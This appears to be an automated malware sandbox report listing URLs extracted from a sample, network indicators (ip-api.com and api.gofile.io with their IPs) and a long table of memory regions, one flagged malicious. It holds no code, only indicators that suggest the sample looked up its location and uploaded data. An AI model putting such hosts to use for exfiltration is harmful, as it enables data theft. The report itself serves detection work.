http://www.rfc-editor.org/info/rfc7253
unknown
https://twitch.com)
unknown
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
https://mahler:8092/site-updates.py
unknown
http://crl.securetrust.com/SGCA.crl
unknown
http://.../back.jpeg
unknown
http://tools.ietf.org/html/rfc5869
unknown
https://www.python.org/download/releases/2.3/mro/.
unknown
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
unknown
https://httpbin.org/post
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
https://github.com/Ousret/charset_normalizer
unknown
http://www.firmaprofesional.com/cps0
unknown
https://discord.gg/pallets
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
api.gofile.io
45.112.123.126

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
45.112.123.126
api.gofile.io
Singapore

Memdumps

Base Address
Regiontype
Protect
Malicious
1E895070000
direct allocation
page read and write
malicious
1E89338A000
heap
page read and write
24BCD652000
heap
page read and write
24BCD638000
heap
page read and write
1E893B67000
heap
page read and write
1E8933C1000
heap
page read and write
1E89365D000
heap
page read and write
24BCD660000
heap
page read and write
1E893928000
heap
page read and write
24BCD652000
heap
page read and write
1E8933C3000
heap
page read and write
1E8933C3000
heap
page read and write
1E894880000
heap
page read and write
1E8935A1000
heap
page read and write
1E893AB1000
heap
page read and write
1E893600000
heap
page read and write
24BCD652000
heap
page read and write
1E891539000
heap
page read and write
1E893A1A000
heap
page read and write
1E893B3A000
heap
page read and write
169170F8000
heap
page read and write
242776B0000
heap
page read and write
1A228639000
heap
page read and write
1E893CEC000
heap
page read and write
1E893B45000
heap
page read and write
1E895D80000
direct allocation
page read and write
1E89396A000
heap
page read and write
1E893A4E000
heap
page read and write
E470DDE000
stack
page read and write
1E893AD8000
heap
page read and write
1E894A13000
heap
page read and write
1E89396A000
heap
page read and write
1E893BFF000
heap
page read and write
24277502000
heap
page read and write
24BCD659000
heap
page read and write
1E894590000
heap
page read and write
1E893562000
heap
page read and write
1E89151E000
heap
page read and write
1E8939AA000
heap
page read and write
1E894C04000
heap
page read and write
24BCD655000
heap
page read and write
1E894ABD000
heap
page read and write
1E893AAF000
heap
page read and write
1E894880000
heap
page read and write
1E894B94000
heap
page read and write
1E893A57000
heap
page read and write
1E8935F7000
heap
page read and write
16178F10000
heap
page read and write
1E894630000
heap
page read and write
1E8935DB000
heap
page read and write
161789E5000
heap
page read and write
16178970000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8946A9000
heap
page read and write
161789B5000
heap
page read and write
1E89336A000
heap
page read and write
1E89333C000
heap
page read and write
1E8933C3000
heap
page read and write
1E8936D6000
heap
page read and write
1E895D60000
direct allocation
page read and write
169173D7000
heap
page read and write
1E8949E5000
heap
page read and write
1E8939DA000
heap
page read and write
1E893C94000
heap
page read and write
1E894B0F000
heap
page read and write
1E8914E9000
heap
page read and write
1E893B1D000
heap
page read and write
1E893688000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD4F0000
heap
page read and write
1E894B30000
heap
page read and write
1E8936B4000
heap
page read and write
1E89488A000
heap
page read and write
1E8947B2000
heap
page read and write
1CE75944000
heap
page read and write
2D0F51FB000
heap
page read and write
16179138000
heap
page read and write
1E89338D000
heap
page read and write
1E894710000
heap
page read and write
16178FC3000
heap
page read and write
1E8933CE000
heap
page read and write
1E893A95000
heap
page read and write
169170F3000
heap
page read and write
1E8947C8000
heap
page read and write
1E8936E8000
heap
page read and write
1E8914DA000
heap
page read and write
242776B5000
heap
page read and write
1E894892000
heap
page read and write
1E89355A000
heap
page read and write
1E8933D6000
heap
page read and write
169170E5000
heap
page read and write
25621344000
heap
page read and write
1E893AFA000
heap
page read and write
1E8933B1000
heap
page read and write
1E8935EE000
heap
page read and write
82CDB8E000
stack
page read and write
1E895D60000
direct allocation
page read and write
1E8935F0000
heap
page read and write
1E893C34000
heap
page read and write
24BCD659000
heap
page read and write
1E893A03000
heap
page read and write
1E893A4D000
heap
page read and write
1E89333B000
heap
page read and write
1E893A52000
heap
page read and write
169178D9000
heap
page read and write
1E8947EA000
heap
page read and write
1E89367F000
heap
page read and write
24BCD652000
heap
page read and write
1E8945B3000
heap
page read and write
1E89397B000
heap
page read and write
48718FF000
stack
page read and write
1E893BE6000
heap
page read and write
20FCB160000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893595000
heap
page read and write
1E894A82000
heap
page read and write
24BCD657000
heap
page read and write
1E894CF3000
heap
page read and write
1E89466B000
heap
page read and write
1E893532000
heap
page read and write
1E89154C000
heap
page read and write
1E89484F000
heap
page read and write
1E8945A1000
heap
page read and write
16919140000
heap
page read and write
1E89332A000
heap
page read and write
242776B4000
heap
page read and write
1E8932F3000
heap
page read and write
24BCD652000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893518000
heap
page read and write
2894F311000
heap
page read and write
1E894B27000
heap
page read and write
1E8933CE000
heap
page read and write
1E8936DC000
heap
page read and write
1E8947B2000
heap
page read and write
1E893A4B000
heap
page read and write
16178992000
heap
page read and write
1E891537000
heap
page read and write
1E89367F000
heap
page read and write
1E893C94000
heap
page read and write
1E893395000
heap
page read and write
3E9297F000
stack
page read and write
1E893375000
heap
page read and write
1E894696000
heap
page read and write
24277440000
heap
page read and write
20BBA050000
heap
page read and write
1E895C60000
direct allocation
page read and write
20BBA070000
heap
page read and write
1E8948AE000
heap
page read and write
16917103000
heap
page read and write
1E893B3A000
heap
page read and write
1E893369000
heap
page read and write
1E894785000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893AD1000
heap
page read and write
1E777C20000
heap
page read and write
136CCC70000
heap
page read and write
24BCD652000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893C2D000
heap
page read and write
1E8933BB000
heap
page read and write
1E893B52000
heap
page read and write
20BBA125000
heap
page read and write
1E893B51000
heap
page read and write
24BCD652000
heap
page read and write
1E894CFE000
heap
page read and write
1E89350B000
heap
page read and write
1E893542000
heap
page read and write
1E8939FF000
heap
page read and write
1E8938F1000
heap
page read and write
1E893C87000
heap
page read and write
24BCD652000
heap
page read and write
1E89457E000
heap
page read and write
24BCD65F000
heap
page read and write
1E893538000
heap
page read and write
172FEFE000
stack
page read and write
1E89356A000
heap
page read and write
1E893B3A000
heap
page read and write
1E894703000
heap
page read and write
1E89393F000
heap
page read and write
2D0F51F0000
heap
page read and write
1E8914EE000
heap
page read and write
1E893A1A000
heap
page read and write
16178FC7000
heap
page read and write
1E8936E3000
heap
page read and write
24BCD652000
heap
page read and write
E8CDEFF000
stack
page read and write
1E893C95000
heap
page read and write
1E89355E000
heap
page read and write
1E8933D6000
heap
page read and write
16917107000
heap
page read and write
1E8939C7000
heap
page read and write
1E89335B000
heap
page read and write
1E893AEE000
heap
page read and write
1E894B23000
heap
page read and write
1E894B70000
heap
page read and write
1E894873000
heap
page read and write
24BCD659000
heap
page read and write
1E893C86000
heap
page read and write
1E894669000
heap
page read and write
1E893681000
heap
page read and write
1E89359A000
heap
page read and write
1E89336F000
heap
page read and write
1B13CFF000
stack
page read and write
1E893693000
heap
page read and write
1E8933CE000
heap
page read and write
1E893927000
heap
page read and write
16917113000
heap
page read and write
1E893A16000
heap
page read and write
1E89354F000
heap
page read and write
161789B6000
heap
page read and write
16179120000
heap
page read and write
24BCD652000
heap
page read and write
1E893589000
heap
page read and write
24BCD652000
heap
page read and write
E8CDCFD000
stack
page read and write
1E893518000
heap
page read and write
1E8939DA000
heap
page read and write
1E8935AA000
heap
page read and write
1E8939B1000
heap
page read and write
169178BA000
heap
page read and write
1E8933CD000
heap
page read and write
1E89367D000
heap
page read and write
1E894CEA000
heap
page read and write
1E894BDE000
heap
page read and write
136CCF60000
heap
page read and write
210748A0000
heap
page read and write
1E89361C000
heap
page read and write
1E892FA4000
heap
page read and write
1E893374000
heap
page read and write
1E893561000
heap
page read and write
1E893377000
heap
page read and write
1E89362D000
heap
page read and write
1E893C9C000
heap
page read and write
169170F8000
heap
page read and write
1E8935E5000
heap
page read and write
1E89488A000
heap
page read and write
1E894B10000
heap
page read and write
1E894C06000
heap
page read and write
16178BA0000
trusted library allocation
page read and write
1E8935C5000
heap
page read and write
1E8946A8000
heap
page read and write
169173DA000
heap
page read and write
1E893CEE000
heap
page read and write
16919155000
heap
page read and write
1E893690000
heap
page read and write
2D0F51ED000
heap
page read and write
1E8947B2000
heap
page read and write
1E8946EF000
heap
page read and write
1E893B7E000
heap
page read and write
9EFB0FF000
unkown
page read and write
1E893332000
heap
page read and write
1E893A11000
heap
page read and write
1E893535000
heap
page read and write
1E8938F1000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893C27000
heap
page read and write
1E894A92000
heap
page read and write
1E89357D000
heap
page read and write
1E8933F0000
direct allocation
page read and write
1E893642000
heap
page read and write
1E893C1F000
heap
page read and write
1E893369000
heap
page read and write
1E894BC2000
heap
page read and write
1EA7FD35000
heap
page read and write
161789F2000
heap
page read and write
1E893514000
heap
page read and write
1E8945A9000
heap
page read and write
1E894673000
heap
page read and write
1E893BE7000
heap
page read and write
1691710C000
heap
page read and write
1E894696000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8939B3000
heap
page read and write
1E893954000
heap
page read and write
1E8949CD000
heap
page read and write
2D0F51A0000
heap
page read and write
1E893688000
heap
page read and write
169178AC000
heap
page read and write
1E894A03000
heap
page read and write
24BCD657000
heap
page read and write
1467292B000
heap
page read and write
1E893B79000
heap
page read and write
1E8935AA000
heap
page read and write
1E89355A000
heap
page read and write
1E8946F1000
heap
page read and write
1E894CD4000
heap
page read and write
24BCD65F000
heap
page read and write
16919141000
heap
page read and write
1E8913F0000
heap
page read and write
1E8933E2000
heap
page read and write
1E8935C6000
heap
page read and write
24BCD657000
heap
page read and write
1E893635000
heap
page read and write
1E89460E000
heap
page read and write
1E893C02000
heap
page read and write
20FCB060000
heap
page read and write
16917108000
heap
page read and write
1E89367F000
heap
page read and write
1E893C02000
heap
page read and write
1E893688000
heap
page read and write
1E895C60000
direct allocation
page read and write
1E893B2E000
heap
page read and write
1E8935DB000
heap
page read and write
24BCD660000
heap
page read and write
24BCD660000
heap
page read and write
1E89477F000
heap
page read and write
1E8939D9000
heap
page read and write
1E894D2E000
heap
page read and write
1E8936E3000
heap
page read and write
1E89358D000
heap
page read and write
1E8948D2000
heap
page read and write
1E893583000
heap
page read and write
1E89369C000
heap
page read and write
1E8948A2000
heap
page read and write
1E893693000
heap
page read and write
1E893928000
heap
page read and write
1E8939BC000
heap
page read and write
1E894BA3000
heap
page read and write
1E8933C3000
heap
page read and write
1E8914ED000
heap
page read and write
1E89469B000
heap
page read and write
1E89487C000
heap
page read and write
1E8933E3000
heap
page read and write
96640FD000
stack
page read and write
1E8938F9000
heap
page read and write
1E8945B4000
heap
page read and write
161789DF000
heap
page read and write
1E89333E000
heap
page read and write
CC3F5BC000
stack
page read and write
1E8938F2000
heap
page read and write
1E893C81000
heap
page read and write
210746BB000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893681000
heap
page read and write
1E896B41000
heap
page read and write
1E8933B2000
heap
page read and write
1E8935EA000
heap
page read and write
1E893B52000
heap
page read and write
1E893A5C000
heap
page read and write
1E8914EF000
heap
page read and write
1E8933DD000
heap
page read and write
1E89351D000
heap
page read and write
1E894815000
heap
page read and write
82CD1DE000
stack
page read and write
1E893AFA000
heap
page read and write
24BCD65F000
heap
page read and write
16178FCB000
heap
page read and write
1E893501000
heap
page read and write
1E894636000
heap
page read and write
24BCD652000
heap
page read and write
1E893BAE000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E894CEA000
heap
page read and write
1E89362F000
heap
page read and write
1E8948A4000
heap
page read and write
1E893B70000
heap
page read and write
1E895D80000
direct allocation
page read and write
1E8939AF000
heap
page read and write
169170F3000
heap
page read and write
1E894A46000
heap
page read and write
169172D0000
trusted library allocation
page read and write
24BCD65F000
heap
page read and write
1E8933A2000
heap
page read and write
1E893621000
heap
page read and write
1E893AD7000
heap
page read and write
1E8939E9000
heap
page read and write
1E894703000
heap
page read and write
24BCD65F000
heap
page read and write
2D0F51ED000
heap
page read and write
1E8948D2000
heap
page read and write
24BCD652000
heap
page read and write
2D0F51F5000
heap
page read and write
1691914F000
heap
page read and write
1E8945D1000
heap
page read and write
1E893A1D000
heap
page read and write
2894F250000
heap
page read and write
20BBA120000
heap
page read and write
1E894670000
heap
page read and write
1E894A90000
heap
page read and write
24BCD657000
heap
page read and write
1E893961000
heap
page read and write
1E893502000
heap
page read and write
161789E3000
heap
page read and write
16179141000
heap
page read and write
1E893B70000
heap
page read and write
1EA7FD30000
heap
page read and write
1E894B14000
heap
page read and write
1E8933C3000
heap
page read and write
1E894BFE000
heap
page read and write
1E894862000
heap
page read and write
169173D0000
heap
page read and write
1E894627000
heap
page read and write
1E8933C3000
heap
page read and write
16178FC0000
heap
page read and write
1E893A1A000
heap
page read and write
1E8947C6000
heap
page read and write
1E89352B000
heap
page read and write
1E893359000
heap
page read and write
1E89356F000
heap
page read and write
1E8947C8000
heap
page read and write
1E894815000
heap
page read and write
24BCD659000
heap
page read and write
E7B1BCF000
stack
page read and write
21074984000
heap
page read and write
1E8945BA000
heap
page read and write
1E894B9F000
heap
page read and write
16179149000
heap
page read and write
1E8933C1000
heap
page read and write
1E893B75000
heap
page read and write
1E894A90000
heap
page read and write
1E894622000
heap
page read and write
1E893B95000
heap
page read and write
24BCD659000
heap
page read and write
1E893C42000
heap
page read and write
1E894696000
heap
page read and write
1E894774000
heap
page read and write
169178C8000
heap
page read and write
1E8939DC000
heap
page read and write
1E893A28000
heap
page read and write
1E896266000
heap
page read and write
1E893536000
heap
page read and write
1E89358B000
heap
page read and write
20BBA124000
heap
page read and write
1E8938F9000
heap
page read and write
1E893698000
heap
page read and write
1E89332B000
heap
page read and write
1691914F000
heap
page read and write
169173D3000
heap
page read and write
1E893657000
heap
page read and write
1E893AE1000
heap
page read and write
16917370000
heap
page read and write
1E893B5A000
heap
page read and write
E7B17ED000
stack
page read and write
1E8936D6000
heap
page read and write
1E893355000
heap
page read and write
1E893632000
heap
page read and write
169178B4000
heap
page read and write
1E8935FF000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893377000
heap
page read and write
1E894070000
direct allocation
page read and write
1E89354C000
heap
page read and write
210746B0000
heap
page read and write
1E894B9C000
heap
page read and write
1E893C50000
heap
page read and write
242774F8000
heap
page read and write
1E893B75000
heap
page read and write
1E895270000
direct allocation
page read and write
1E89395B000
heap
page read and write
24BCD652000
heap
page read and write
1E89355B000
heap
page read and write
169171B0000
heap
page read and write
1A04CF69000
heap
page read and write
1E8936C6000
heap
page read and write
169178B4000
heap
page read and write
1E89354B000
heap
page read and write
1E8948AF000
heap
page read and write
1E893AEB000
heap
page read and write
1E893C37000
heap
page read and write
24BCD652000
heap
page read and write
1E893A73000
heap
page read and write
1E894A99000
heap
page read and write
24BCD659000
heap
page read and write
1E89482F000
heap
page read and write
1E894BD2000
heap
page read and write
1E893C42000
heap
page read and write
1A228864000
heap
page read and write
14672890000
heap
page read and write
1E893C26000
heap
page read and write
1E894696000
heap
page read and write
1E89356A000
heap
page read and write
1E89332C000
heap
page read and write
24BCD660000
heap
page read and write
1E893CE6000
heap
page read and write
1617A9BE000
heap
page read and write
82CD99E000
stack
page read and write
1617A9BD000
heap
page read and write
169170F5000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E894703000
heap
page read and write
1E894B9F000
heap
page read and write
16179138000
heap
page read and write
24BCD652000
heap
page read and write
1617911E000
heap
page read and write
1E894B34000
heap
page read and write
25621340000
heap
page read and write
1E89350E000
heap
page read and write
1E893326000
heap
page read and write
1E8946A8000
heap
page read and write
1E893597000
heap
page read and write
1E8945B5000
heap
page read and write
1E893A0D000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8949EE000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893361000
heap
page read and write
1E8938F4000
heap
page read and write
1E777C54000
heap
page read and write
1E89394F000
heap
page read and write
2D0F5424000
heap
page read and write
24BCD659000
heap
page read and write
24BCD660000
heap
page read and write
1E89336E000
heap
page read and write
1E893C44000
heap
page read and write
1E8933C3000
heap
page read and write
1E894696000
heap
page read and write
2D0F51C8000
heap
page read and write
1E893BC3000
heap
page read and write
1E8914D6000
heap
page read and write
1E89365E000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E891511000
heap
page read and write
1E894A10000
heap
page read and write
1E891430000
unkown
page readonly
1E8936D6000
heap
page read and write
169173D2000
heap
page read and write
1E893903000
heap
page read and write
1E893A73000
heap
page read and write
1E893377000
heap
page read and write
1E894657000
heap
page read and write
1E893693000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893562000
heap
page read and write
1E8933D3000
heap
page read and write
16178FCA000
heap
page read and write
1E893CEE000
heap
page read and write
1E893B01000
heap
page read and write
1E893C86000
heap
page read and write
1E8945D6000
heap
page read and write
1E8932F0000
heap
page read and write
1E893506000
heap
page read and write
1E89354C000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8930F0000
direct allocation
page read and write
1E89469C000
heap
page read and write
1E895C60000
direct allocation
page read and write
E470D5B000
stack
page read and write
3E9287F000
stack
page read and write
1E8933DC000
heap
page read and write
1E89332F000
heap
page read and write
24BCD65E000
heap
page read and write
1E8936CB000
heap
page read and write
1E893B70000
heap
page read and write
161789F2000
heap
page read and write
1E777D40000
heap
page read and write
1E894B9C000
heap
page read and write
1E893A96000
heap
page read and write
1E89351B000
heap
page read and write
1E894B2C000
heap
page read and write
1E894815000
heap
page read and write
1E8932F7000
heap
page read and write
1E895C60000
direct allocation
page read and write
1E8948D2000
heap
page read and write
1E8936DA000
heap
page read and write
1E893586000
heap
page read and write
1E894ABA000
heap
page read and write
1E894787000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893B76000
heap
page read and write
1E893B75000
heap
page read and write
1E894D31000
heap
page read and write
1E8936C9000
heap
page read and write
1E894B3A000
heap
page read and write
24BCD652000
heap
page read and write
1E893BFF000
heap
page read and write
1E893B2A000
heap
page read and write
1E89478B000
heap
page read and write
1E893A4C000
heap
page read and write
1E893B75000
heap
page read and write
1E89332B000
heap
page read and write
1E894B62000
heap
page read and write
1E8936DC000
heap
page read and write
1E894C40000
heap
page read and write
1E89466B000
heap
page read and write
1E8936C6000
heap
page read and write
1E8933B6000
heap
page read and write
1E893315000
heap
page read and write
1E893BAD000
heap
page read and write
24BCD65F000
heap
page read and write
1E894794000
heap
page read and write
7FF733391000
unkown
page execute read
1E89487C000
heap
page read and write
1617913B000
heap
page read and write
29F32DE0000
heap
page read and write
1E894600000
heap
page read and write
1E893536000
heap
page read and write
169178B0000
heap
page read and write
1E893687000
heap
page read and write
1E891509000
heap
page read and write
1E89369F000
heap
page read and write
1E894BFE000
heap
page read and write
1E893345000
heap
page read and write
16178FCA000
heap
page read and write
1E8939B1000
heap
page read and write
1E893377000
heap
page read and write
1E893A11000
heap
page read and write
1E893693000
heap
page read and write
1E893398000
heap
page read and write
1E895D90000
direct allocation
page read and write
169170D6000
heap
page read and write
16178B70000
heap
page read and write
9EFAD4C000
stack
page read and write
1E8936EC000
heap
page read and write
1E893348000
heap
page read and write
1E89151D000
heap
page read and write
1E8939F7000
heap
page read and write
235FD8F0000
heap
page read and write
1E8945BB000
heap
page read and write
1E8949FB000
heap
page read and write
24BCD659000
heap
page read and write
1E8933CE000
heap
page read and write
29F32CE0000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8932F1000
heap
page read and write
1E8945E7000
heap
page read and write
1E894C03000
heap
page read and write
CC3F9FF000
stack
page read and write
1E893AEE000
heap
page read and write
161789B2000
heap
page read and write
82CD7AE000
stack
page read and write
11FCFFF000
stack
page read and write
1E893370000
heap
page read and write
20FCB093000
heap
page read and write
1E89351F000
heap
page read and write
1E893B81000
heap
page read and write
1E893512000
heap
page read and write
169178C8000
heap
page read and write
136CCC79000
heap
page read and write
E47117F000
stack
page read and write
1E893A18000
heap
page read and write
1E893A97000
heap
page read and write
1E89356A000
heap
page read and write
1E895C60000
direct allocation
page read and write
1E89334A000
heap
page read and write
1E8936D6000
heap
page read and write
1E893BBD000
heap
page read and write
1E89334C000
heap
page read and write
1E893C94000
heap
page read and write
1E8914DD000
heap
page read and write
1E8936EE000
heap
page read and write
1E89488D000
heap
page read and write
16178FC7000
heap
page read and write
1E89331C000
heap
page read and write
1E893A5C000
heap
page read and write
E8CDDFE000
unkown
page read and write
1E895D60000
direct allocation
page read and write
7FF7333D6000
unkown
page readonly
1E89463B000
heap
page read and write
1E8939A3000
heap
page read and write
1E777E84000
heap
page read and write
1617A9C4000
heap
page read and write
1E8936AB000
heap
page read and write
169170FA000
heap
page read and write
1E894834000
heap
page read and write
24BCD659000
heap
page read and write
5F500FF000
stack
page read and write
1E893327000
heap
page read and write
2D0F51FB000
heap
page read and write
1E89368E000
heap
page read and write
25621345000
heap
page read and write
1E894BD5000
heap
page read and write
1E893385000
heap
page read and write
1E8935EA000
heap
page read and write
1CE75687000
heap
page read and write
1E894893000
heap
page read and write
1E89151D000
heap
page read and write
1E894BDE000
heap
page read and write
14672CA4000
heap
page read and write
24277420000
heap
page read and write
1E89487C000
heap
page read and write
E7B19DF000
stack
page read and write
1E8933E0000
heap
page read and write
1E893542000
heap
page read and write
1E8948E2000
heap
page read and write
1E893B67000
heap
page read and write
1E8939DA000
heap
page read and write
3E925CF000
stack
page read and write
1E89366C000
heap
page read and write
1E893C06000
heap
page read and write
1E893A19000
heap
page read and write
1E893C94000
heap
page read and write
1E893C94000
heap
page read and write
1E894850000
heap
page read and write
1E893A5B000
heap
page read and write
1E894790000
heap
page read and write
1E8914E2000
heap
page read and write
1E89466B000
heap
page read and write
BF595FF000
stack
page read and write
1E894BD5000
heap
page read and write
1E8949D7000
heap
page read and write
1E8939F8000
heap
page read and write
1E893BF1000
heap
page read and write
1E894A33000
heap
page read and write
1E89460F000
heap
page read and write
1E893BCE000
heap
page read and write
1691710B000
heap
page read and write
1E777C40000
heap
page read and write
1E8945C0000
heap
page read and write
1E8946AC000
heap
page read and write
20BBA250000
heap
page read and write
1E8939CA000
heap
page read and write
1E891517000
heap
page read and write
1E89356A000
heap
page read and write
1E89354F000
heap
page read and write
1E893679000
heap
page read and write
1E8945C2000
heap
page read and write
136CCBD0000
heap
page read and write
1E893B0D000
heap
page read and write
1E893A60000
heap
page read and write
161789FD000
heap
page read and write
1E89361C000
heap
page read and write
1E8933DC000
heap
page read and write
16178980000
heap
page read and write
16179138000
heap
page read and write
161789E2000
heap
page read and write
1E89354F000
heap
page read and write
1E8949D7000
heap
page read and write
1E893542000
heap
page read and write
14672920000
heap
page read and write
1E8946A9000
heap
page read and write
24BCD653000
heap
page read and write
1E893635000
heap
page read and write
16179149000
heap
page read and write
1E891536000
heap
page read and write
1E893A23000
heap
page read and write
1E894A90000
heap
page read and write
1E8945C4000
heap
page read and write
1E893C26000
heap
page read and write
1E894D14000
heap
page read and write
1E8946A8000
heap
page read and write
1E8948DB000
heap
page read and write
2D0F51ED000
heap
page read and write
169170D6000
heap
page read and write
1E893514000
heap
page read and write
1E895C50000
direct allocation
page read and write
1E893984000
heap
page read and write
136CCC83000
heap
page read and write
1E893BFC000
heap
page read and write
1E893B1E000
heap
page read and write
1E893A64000
heap
page read and write
1E893C02000
heap
page read and write
82CCFE2000
stack
page read and write
7FF7333D4000
unkown
page read and write
1E893AFE000
heap
page read and write
1E89359A000
heap
page read and write
1E894639000
heap
page read and write
1E893AE1000
heap
page read and write
1E893B75000
heap
page read and write
1E893398000
heap
page read and write
24BCD660000
heap
page read and write
24BCD659000
heap
page read and write
1E893377000
heap
page read and write
1E8939B1000
heap
page read and write
1E893A62000
heap
page read and write
1E893355000
heap
page read and write
1E893635000
heap
page read and write
1E893369000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E89399B000
heap
page read and write
1E893B3A000
heap
page read and write
1E89338C000
heap
page read and write
1E893652000
heap
page read and write
1E894ABB000
heap
page read and write
1E891500000
heap
page read and write
1E894A89000
heap
page read and write
1E8949CD000
heap
page read and write
1E893BFF000
heap
page read and write
1E8947DB000
heap
page read and write
24BCD652000
heap
page read and write
169178CB000
heap
page read and write
24BCD600000
heap
page read and write
1E893C02000
heap
page read and write
1E893B70000
heap
page read and write
1E89392F000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD652000
heap
page read and write
1E893B4F000
heap
page read and write
24BCD652000
heap
page read and write
24BCD652000
heap
page read and write
1E893B76000
heap
page read and write
1E8939CA000
heap
page read and write
1E896B60000
heap
page read and write
169170F3000
heap
page read and write
1E893BF1000
heap
page read and write
1E89359C000
heap
page read and write
1E89355B000
heap
page read and write
1E893516000
heap
page read and write
1E893693000
heap
page read and write
1E893B5A000
heap
page read and write
79DD1FF000
stack
page read and write
1E893B0F000
heap
page read and write
1E894703000
heap
page read and write
1E893517000
heap
page read and write
1E89355A000
heap
page read and write
1E893C09000
heap
page read and write
1E89461B000
heap
page read and write
1E89333B000
heap
page read and write
16917300000
heap
page read and write
1E893C41000
heap
page read and write
1E893928000
heap
page read and write
1E893981000
heap
page read and write
1E894C04000
heap
page read and write
24BCD652000
heap
page read and write
1E89367B000
heap
page read and write
1E8936F0000
direct allocation
page read and write
1E8935C7000
heap
page read and write
1E893376000
heap
page read and write
1E8933B5000
heap
page read and write
24BCD660000
heap
page read and write
1E893558000
heap
page read and write
1E894BFE000
heap
page read and write
1E894716000
heap
page read and write
1E893B3A000
heap
page read and write
1E893593000
heap
page read and write
1E893322000
heap
page read and write
2D0F51FB000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893B97000
heap
page read and write
16917113000
heap
page read and write
1E89357F000
heap
page read and write
1E893557000
heap
page read and write
1E89338D000
heap
page read and write
16179141000
heap
page read and write
1E8947B2000
heap
page read and write
169178B1000
heap
page read and write
1E893BCC000
heap
page read and write
1E8949CD000
heap
page read and write
1E8936A0000
heap
page read and write
1E8939EE000
heap
page read and write
1E8949CD000
heap
page read and write
235FD540000
heap
page read and write
1E893514000
heap
page read and write
2894F230000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893606000
heap
page read and write
1E8913C0000
heap
page read and write
169173D7000
heap
page read and write
1E893C41000
heap
page read and write
2D0F51F0000
heap
page read and write
1E8936CB000
heap
page read and write
1E8945E2000
heap
page read and write
7E202FC000
stack
page read and write
1E8949E2000
heap
page read and write
1E8936C1000
heap
page read and write
7FF733390000
unkown
page readonly
24277502000
heap
page read and write
1E89336D000
heap
page read and write
1E8947F5000
heap
page read and write
1E894D2E000
heap
page read and write
1E894B1C000
heap
page read and write
24BCD652000
heap
page read and write
E7B17E2000
stack
page read and write
20FCB180000
heap
page read and write
24BCD65E000
heap
page read and write
2D0F52A0000
heap
page read and write
1E893680000
heap
page read and write
1E8935AA000
heap
page read and write
1E893562000
heap
page read and write
1E893A9B000
heap
page read and write
24BCD652000
heap
page read and write
1E8933CE000
heap
page read and write
1E893B51000
heap
page read and write
20FCB06B000
heap
page read and write
1E8939E1000
heap
page read and write
1E893C80000
heap
page read and write
1E89395A000
heap
page read and write
16179118000
heap
page read and write
1E89334D000
heap
page read and write
169178BA000
heap
page read and write
169173DB000
heap
page read and write
2D0F51F2000
heap
page read and write
20BB9F70000
heap
page read and write
1E893690000
heap
page read and write
235FD699000
heap
page read and write
1E893C36000
heap
page read and write
8A8E2FF000
stack
page read and write
7FF733390000
unkown
page readonly
1E8933D3000
heap
page read and write
169178D1000
heap
page read and write
1E893CEE000
heap
page read and write
24BCD652000
heap
page read and write
1A04D0E0000
heap
page read and write
1E8933DE000
heap
page read and write
1E893665000
heap
page read and write
1E894BB5000
heap
page read and write
24277502000
heap
page read and write
1E89151D000
heap
page read and write
25621250000
heap
page read and write
1E893A01000
heap
page read and write
24BCD652000
heap
page read and write
1E8935EA000
heap
page read and write
24BCD660000
heap
page read and write
1E893554000
heap
page read and write
1E893986000
heap
page read and write
1E8914DC000
heap
page read and write
1E894B59000
heap
page read and write
1E893B91000
heap
page read and write
1E894880000
heap
page read and write
14672941000
heap
page read and write
2894F5A0000
heap
page read and write
1E894613000
heap
page read and write
16178FCA000
heap
page read and write
1E893591000
heap
page read and write
169178A8000
heap
page read and write
1E89358D000
heap
page read and write
24BCD657000
heap
page read and write
1E89367E000
heap
page read and write
1E893924000
heap
page read and write
1E8945D1000
heap
page read and write
1E89337A000
heap
page read and write
1E894BDE000
heap
page read and write
1E894595000
heap
page read and write
1E893602000
heap
page read and write
1E89332C000
heap
page read and write
1E893C3C000
heap
page read and write
1E893B67000
heap
page read and write
1E89459F000
heap
page read and write
1E894703000
heap
page read and write
16179124000
heap
page read and write
1E893A9D000
heap
page read and write
24BCD652000
heap
page read and write
1E8939AB000
heap
page read and write
1E893690000
heap
page read and write
1E89154C000
heap
page read and write
1E894A8E000
heap
page read and write
1E8948A2000
heap
page read and write
1E894D14000
heap
page read and write
235FD620000
heap
page read and write
1E893A2C000
heap
page read and write
1E894851000
heap
page read and write
1E89398A000
heap
page read and write
1E89466B000
heap
page read and write
1E89362E000
heap
page read and write
1E89471A000
heap
page read and write
2D0F51D9000
heap
page read and write
20FCB1C5000
heap
page read and write
1E8933B1000
heap
page read and write
1E895C60000
direct allocation
page read and write
1E893BFF000
heap
page read and write
1E8935C7000
heap
page read and write
24BCD660000
heap
page read and write
1E893AD1000
heap
page read and write
1E8936D7000
heap
page read and write
1E8932F1000
heap
page read and write
1E893A92000
heap
page read and write
1E895C60000
direct allocation
